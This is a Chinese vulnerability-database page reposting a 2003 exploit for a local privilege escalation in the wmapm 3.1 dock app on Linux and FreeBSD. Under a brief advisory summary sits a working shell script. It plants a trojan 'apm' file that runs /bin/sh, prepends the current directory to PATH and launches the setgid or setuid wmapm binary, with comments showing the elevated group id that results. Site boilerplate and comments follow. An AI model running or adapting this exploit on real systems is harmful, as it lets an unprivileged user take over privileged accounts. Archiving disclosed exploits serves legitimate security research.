WMAPM 3.1 – Local Privilege Escalation
漏洞ID | 1054239 | 漏洞类型 | |
发布时间 | 2003-11-08 | 更新时间 | 2003-11-08 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | Linux | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/8995/info
wmapm has been reported prone to a local privilege escalation vulnerability. The vulnerability has been conjectured to result from a lack of relative path usage while the vulnerable dock app is invoking a third party binary. As a result of this, a local attacker may manipulate local path settings and have the setuid wmapm dock app erroneously invoke a trojan binary that is located in a directory that the attacker has permissions to write to.
#/bin/sh
# Pretty useless, we can mess up /etc/dumpdates or run shutdown
# on FreeBSD systems with wmapm from ports.
# If wmapm is installed from source we get root instead,
# so I suppose this might be worth something(uid 0) on linux.
# kokanin@dtors~ pkg_info | grep -i wmapm
# wmapm-3.1 Laptop battery status display for WindowMaker
# kokanin@dtors~ ls -la `which wmapm`
# -rwxr-sr-x 1 root operator 41892 Mar 23 10:00 /usr/X11R6/bin/wmapm
# kokanin@dtors~ sh DSR-wmapm.sh
# press the S button when wmapm starts
# $ /usr/bin/id
# uid=1001(kokanin) gid=1001(kokanin) egid=5(operator) groups=5(operator), 1001(kokanin), 0(wheel), 666(lewsers)
echo "/bin/sh" > apm
chmod +x ./apm
echo "press the S button(not the key, the BUTTON, in the PROGRAM) when wmapm starts"
export PATH=.:$PATH
/usr/X11R6/bin/wmapm
rm ./apm
.reg文件注册表漏洞 漏洞ID 1207600 漏洞类型 未知 发布时间 1997-01-01 更新时间 1997-01-01 CVE编号 CVE-1999-0572 CNNVD-ID CNNVD-199701-014 漏洞平台 N/A CVSS评分 9.3…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666